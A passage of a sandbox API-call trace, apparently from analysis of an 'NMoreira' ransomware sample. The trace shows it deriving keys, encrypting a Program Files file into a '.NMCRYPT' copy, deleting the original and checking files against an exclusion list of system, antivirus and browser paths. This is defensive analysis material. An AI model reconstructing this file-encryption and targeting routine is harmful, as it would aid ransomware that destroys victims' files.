pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.631] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0156.631] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0156.632] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0156.632] CryptHashData (hHash=0x9ad2b8, pbData=0x2d7dd10, dwDataLen=0x100, dwFlags=0x0) returned 1 [0156.632] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad2b8, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad278) returned 1 [0156.632] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x1, pbData=0x2d7de10, dwFlags=0x0) returned 1 [0156.632] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x4, pbData=0x2d7dcc0*=0x1, dwFlags=0x0) returned 1 [0156.632] wcslen (_String="\\\\?\\") returned 0x4 [0156.632] CryptDuplicateKey (in: hKey=0x9ad278, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7dc94 | out: phKey=0x2d7dc94*=0x9ad838) returned 1 [0156.632] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0156.632] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0156.632] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7dc84 | out: lpFileSize=0x2d7dc84*=903) returned 1 [0156.633] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7dc7c*=0x200, lpOverlapped=0x0) returned 1 [0156.633] ReadFile (in: hFile=0x1624, lpBuffer=0x607d60, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d60*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.634] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.634] GetLastError () returned 0x0 [0156.634] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.637] ReadFile (in: hFile=0x1624, lpBuffer=0x607d60, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d60*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.637] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.637] GetLastError () returned 0x0 [0156.637] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.637] ReadFile (in: hFile=0x1624, lpBuffer=0x607d60, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d60*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.637] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.637] GetLastError () returned 0x0 [0156.637] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.637] ReadFile (in: hFile=0x1624, lpBuffer=0x607d60, nNumberOfBytesToRead=0x87, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d60*, lpNumberOfBytesRead=0x2d7dc80*=0x87, lpOverlapped=0x0) returned 1 [0156.637] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x87, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x90) returned 1 [0156.637] GetLastError () returned 0x0 [0156.637] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x90, lpOverlapped=0x0) returned 1 [0156.637] ReadFile (in: hFile=0x1624, lpBuffer=0x607d60, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d60*, lpNumberOfBytesRead=0x2d7dc80*=0x0, lpOverlapped=0x0) returned 1 [0156.637] WriteFile (in: hFile=0x588, lpBuffer=0x607d60*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x607d60*, lpNumberOfBytesWritten=0x2d7dc7c*=0x0, lpOverlapped=0x0) returned 1 [0156.637] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml")) returned 0x20 [0156.638] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", dwFileAttributes=0x20) returned 0 [0156.638] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 1 [0156.638] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml")) returned 0 [0156.638] wcscpy (in: _Dest=0x2d7d7d4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" [0156.638] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad") returned 1 [0156.638] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7d9dc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\.xXD706.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\.xxd706.tmp")) returned 0xd706 [0156.639] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\.xXD706.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\.xxd706.tmp"), dwFlags=0x1) returned 0 [0156.639] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\.xXD706.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\.xxd706.tmp")) returned 1 [0156.640] CryptDestroyKey (hKey=0x9ad838) returned 1 [0156.640] wcslen (_String="OK") returned 0x2 [0156.640] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0156.640] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0156.640] CryptDestroyKey (hKey=0x9ad278) returned 1 [0156.640] CryptDestroyHash (hHash=0x9ad2b8) returned 1 [0156.640] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0156.640] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*NMCRYPT") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*Recovers your files.html") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*.exe") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*.dll") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*.lnk") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*.bat") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*.ini") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*.msi") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*.scf") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*pagefile.sys*") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*NTUSER.DAT*") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*AppData*") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*\\winrar\\*") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*\\java\\*") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*\\windows\\*") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*\\ESET\\*") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*\\AVG\\*") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*\\AVIRA\\*") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*Atheros*") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*Realtek*") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*bootmgr*") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*boot*") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*boot*") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*CONFIG.SYS*") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*IO.SYS*") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*MSDOS.SYS*") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*NTDETECT.COM*") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*ntldr*") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*chrome*") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*opera*") returned 0 [0156.640] PathMatchSpecW (pszFile="kor-kor.xml", pszSpec="*firefox*") returned 0 [0156.641] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", pszSpec="*") returned 1 [0156.641] strlen (_Str="NMoreira") returned 0x8 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.641] CryptGenRandom (in: hProv=0x8bf310, 